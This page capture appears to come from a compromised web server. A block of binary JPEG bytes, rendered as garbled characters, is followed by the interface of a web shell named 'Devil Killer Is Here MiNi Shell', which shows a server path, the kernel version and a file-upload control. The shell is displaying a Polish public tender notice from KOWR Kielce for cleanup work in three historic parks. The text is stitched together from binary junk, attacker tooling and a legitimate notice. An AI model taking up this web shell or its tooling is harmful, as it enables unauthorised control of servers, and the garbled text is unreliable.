JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240821/0046591501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usługi porządkowania parków wpisanych do rejestru zabytków prowadzonego przez Wojewódzkiego Konserwatora Zabytków<br/>wchodzących w skład ZWRSP. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA ODDZIAŁ TERENOWY W KIELCACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800041</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piaskowa 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-323</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413433190</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.kielce@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usługi porządkowania parków wpisanych do rejestru zabytków prowadzonego przez Wojewódzkiego Konserwatora Zabytków<br/>wchodzących w skład ZWRSP. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-32a5d292-612d-44a0-9f33-4027f99ea7f0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00465915</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00104892/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wykonanie usługi porządkowania parków wpisanych do rejestru zabytków prowadzonego przez Wojewódzkiego Konserwatora Zabytków wchodzących w skład ZWRSP.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem https://kowr.eb2b.com.pl/ i pod numerem postępowania KIE.WO.260.1.2024.DT. Szczegółowe informacje znajdują się w Rozdziale XVII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelkie dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składające się na ofertę, składane są przez Wykonawcę przy użyciu zakładki „Załączniki” w trakcie etapu składania ofert. Dokumenty elektroniczne, oświadczenia, uzupełnienia, elektroniczne kopie dokumentów lub oświadczeń składane przez Wykonawcę po złożeniu ofert (np. na wezwanie Zamawiającego), składane są przy użyciu zakładki „Pytania/informacje”. Ewentualne wnioski o wyjaśnienie treści SWZ, także składane są przy użyciu zakładki „Pytania/informacje”. Szczegółowe informacje znajdują się w Rozdziale XVII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIE.WO.260.1.2024.DT</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 342675,93 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest porządkowanie parków wpisanych do rejestru zabytków zgodnie z zaleceniami pokontrolnymi Wojewódzkiego Konserwatora Zabytków:<br/>	Parku w Sprowie, który jest wpisany do rejestru zabytków pod numerem A.148 położonego w gminie Słupia zlokalizowanego na działkach nr 312/1, 312/3, 312/4, 312/6; <br/>	Zakres prac w zadaniu częściowym nr 1 został opisany w Załączniku nr 3a – Projektowane postanowienia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteriami oceny ofert w postępowaniu są: <br/>1) cena brutto – waga 60% (60 pkt)<br/>2) termin wykonania zamówienia – waga 40% (40 pkt)<br/>2. Porównywaną ceną będzie cena brutto za wykonanie zamówienia. <br/>W kryterium „cena” każda z ofert niepodlegających odrzuceniu będzie punktowana według poniższego wzoru: <br/>C = (Cn : Cb) x 60<br/>gdzie: <br/>C – punkty za kryterium cena, <br/>Cn – cena najniższa spośród nieodrzuconych ofert, <br/>Cb – cena oferty badanej.<br/>3.	W kryterium „termin wykonania zamówienia” każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/>3.1.	Dla zadania częściowego nr 1:<br/>3.1.1.	W kryterium „termin wykonania zamówienia” w zadaniu częściowym nr 1, każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/>	Termin realizacji do 30 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 0,00 punktów (warunek podstawowy – zgodnie z zapisami w SWZ);<br/>	Termin realizacji w przedziale 29-27 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 10 pkt;<br/>	Termin realizacji w przedziale 26-24 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 20 pkt;<br/>	Termin realizacji w przedziale 23-21 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 30 pkt;<br/>	Termin realizacji w przedziale 20 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 40 pkt<br/>3.1.2.	Zamawiający oceni oferty w niniejszym kryterium na podstawie informacji wskazanej przez Wykonawcę w ofercie.<br/>3.1.3.	Zadeklarowanie terminu wykonania dłuższego niż wskazany w SWZ maksymalny termin wykonania zamówienia spowoduje odrzucenie oferty na podst. art. 226 ust. 1 pkt 5) ustawy Pzp gdyż treść oferty nie odpowiada treści Specyfikacji Warunków Zamówienia. <br/>3.1.4.	W przypadku nie wpisania przez Wykonawcę żadnego terminu wykonania zamówienia w formularzu ofertowym, Zamawiający przyjmuje do oceny, <br/>iż Wykonawca deklaruje wykonanie zamówienia w podstawowym terminie <br/>tj. do 30 dni kalendarzowych liczonych od zawarcia umowy oraz przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>3.1.5.	Zadeklarowanie terminu wykonania krótszego niż wskazany w SWZ najkrótszy termin realizacji tj. -20 dni kalendarzowych od dnia zawarcia umowy wykonawczej spowoduje uznanie przez Zamawiającego iż oferta jest obarczona inną omyłką polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty i wyznaczy Wykonawcy odpowiedni termin na wyrażenie zgody na poprawienie w ofercie omyłki poprzez uznanie iż Wykonawca zaproponował najkrótszy możliwy termin tj. 20 dni lub zakwestionowanie jej poprawienia. W przypadku braku zgody na poprawienie omyłki Zamawiający odrzuci ofertę na podst. art. 226 ust. 1 pkt 5) ustawy Pzp – treść oferty nie odpowiada treści specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest porządkowanie parków wpisanych do rejestru zabytków zgodnie z zaleceniami pokontrolnymi Wojewódzkiego Konserwatora Zabytków:<br/>	Części Parku w Śladkowie Dużym, który wpisany jest do rejestru zabytków pod nr A.302, położonego w gminie Chmielnik, zlokalizowanego na części dz. nr 343/4 i 343 /6, stanowiących stawy wraz z częścią grobli;<br/>	Zakres prac w zadaniu częściowym nr 2 został opisany w Załączniku nr 3b – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteriami oceny ofert w postępowaniu są: <br/>1) cena brutto – waga 60% (60 pkt)<br/>2) termin wykonania zamówienia – waga 40% (40 pkt)<br/>2. Porównywaną ceną będzie cena brutto za wykonanie zamówienia. <br/>W kryterium „cena” każda z ofert niepodlegających odrzuceniu będzie punktowana według poniższego wzoru: <br/>C = (Cn : Cb) x 60<br/>gdzie: <br/>C – punkty za kryterium cena, <br/>Cn – cena najniższa spośród nieodrzuconych ofert, <br/>Cb – cena oferty badanej.<br/>3.	W kryterium „termin wykonania zamówienia” każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/><br/>3.1.	Dla zadania częściowego nr 2:<br/>3.1.1.	W kryterium „termin wykonania zamówienia” w zadaniu częściowym nr 2, każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/>	Termin realizacji do 20 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 0,00 punktów (warunek podstawowy – zgodnie z zapisami w SWZ);<br/>	Termin realizacji w przedziale 19-17 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 10 pkt;<br/>	Termin realizacji w przedziale 16-14 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 20 pkt;<br/>	Termin realizacji w przedziale 13-11 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 30 pkt;<br/>	Termin realizacji w przedziale 10 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 40 pkt<br/>3.1.2.	Zamawiający oceni oferty w niniejszym kryterium na podstawie informacji wskazanej przez Wykonawcę w ofercie.<br/>3.1.3.	Zadeklarowanie terminu wykonania dłuższego niż wskazany w SWZ maksymalny termin wykonania zamówienia spowoduje odrzucenie oferty na podst. art. 226 ust. 1 pkt 5) ustawy Pzp gdyż treść oferty nie odpowiada treści Specyfikacji Warunków Zamówienia. <br/>3.1.4.	W przypadku nie wpisania przez Wykonawcę żadnego terminu wykonania zamówienia w formularzu ofertowym, Zamawiający przyjmuje do oceny, <br/>iż Wykonawca deklaruje wykonanie zamówienia w podstawowym terminie <br/>tj. do 20 dni kalendarzowych, liczonych od zawarcia umowy oraz przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>3.1.5.	Zadeklarowanie terminu wykonania krótszego niż wskazany w SWZ najkrótszy termin realizacji tj. -10 dni kalendarzowych od dnia zawarcia umowy wykonawczej spowoduje uznanie przez Zamawiającego iż oferta jest obarczona inną omyłką polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty i wyznaczy Wykonawcy odpowiedni termin na wyrażenie zgody na poprawienie w ofercie omyłki poprzez uznanie iż Wykonawca zaproponował najkrótszy możliwy termin tj. 10 dni lub zakwestionowanie jej poprawienia. W przypadku braku zgody na poprawienie omyłki Zamawiający odrzuci ofertę na podst. art. 226 ust. 1 pkt 5) ustawy Pzp – treść oferty nie odpowiada treści specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest porządkowanie parków wpisanych do rejestru zabytków zgodnie z zaleceniami pokontrolnymi Wojewódzkiego Konserwatora Zabytków:<br/>	Parku w Drożejowicach, który jest wpisany do rejestru zabytków pod numerem A.204, położonego w gminie Skalbmierz, zlokalizowanego na działce nr 442/55;<br/>	Zakres prac w zadaniu częściowym nr 3 został opisany w Załączniku nr 3c – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteriami oceny ofert w postępowaniu są: <br/>1) cena brutto – waga 60% (60 pkt)<br/>2) termin wykonania zamówienia – waga 40% (40 pkt)<br/>2. Porównywaną ceną będzie cena brutto za wykonanie zamówienia. <br/>W kryterium „cena” każda z ofert niepodlegających odrzuceniu będzie punktowana według poniższego wzoru: <br/>C = (Cn : Cb) x 60<br/>gdzie: <br/>C – punkty za kryterium cena, <br/>Cn – cena najniższa spośród nieodrzuconych ofert, <br/>Cb – cena oferty badanej.<br/>3.	W kryterium „termin wykonania zamówienia” każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/><br/><br/>3.1.	Dla zadania częściowego nr 3:<br/>3.1.1.	W kryterium „termin wykonania zamówienia” w zadaniu częściowym nr 3, każda z ofert niepodlegających odrzuceniu będzie punktowana następująco:<br/>	Termin realizacji do 20 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 0,00 punktów (warunek podstawowy – zgodnie z zapisami w SWZ);<br/>	Termin realizacji w przedziale 19-17 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 10 pkt;<br/>	Termin realizacji w przedziale 16-14 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 20 pkt;<br/>	Termin realizacji w przedziale 13-11 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 30 pkt;<br/>	Termin realizacji w przedziale 10 dni kalendarzowych od dnia zawarcia umowy: Zamawiający przyzna 40 pkt<br/>3.1.2.	Zamawiający oceni oferty w niniejszym kryterium na podstawie informacji wskazanej przez Wykonawcę w ofercie.<br/>3.1.3.	Zadeklarowanie terminu wykonania dłuższego niż wskazany w SWZ maksymalny termin wykonania zamówienia spowoduje odrzucenie oferty na podst. art. 226 ust. 1 pkt 5) ustawy Pzp gdyż treść oferty nie odpowiada treści Specyfikacji Warunków Zamówienia. <br/>3.1.4.	W przypadku nie wpisania przez Wykonawcę żadnego terminu wykonania zamówienia w formularzu ofertowym, Zamawiający przyjmuje do oceny, <br/>iż Wykonawca deklaruje wykonanie zamówienia w podstawowym terminie <br/>tj. do 20 dni kalendarzowych liczonych od zawarcia umowy oraz przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>3.1.5.	Zadeklarowanie terminu wykonania krótszego niż wskazany w SWZ najkrótszy termin realizacji tj. -10 dni kalendarzowych od dnia zawarcia umowy wykonawczej spowoduje uznanie przez Zamawiającego iż oferta jest obarczona inną omyłką polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty i wyznaczy Wykonawcy odpowiedni termin na wyrażenie zgody na poprawienie w ofercie omyłki poprzez uznanie iż Wykonawca zaproponował najkrótszy możliwy termin tj. 10 dni lub zakwestionowanie jej poprawienia. W przypadku braku zgody na poprawienie omyłki Zamawiający odrzuci ofertę na podst. art. 226 ust. 1 pkt 5) ustawy Pzp – treść oferty nie odpowiada treści specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> 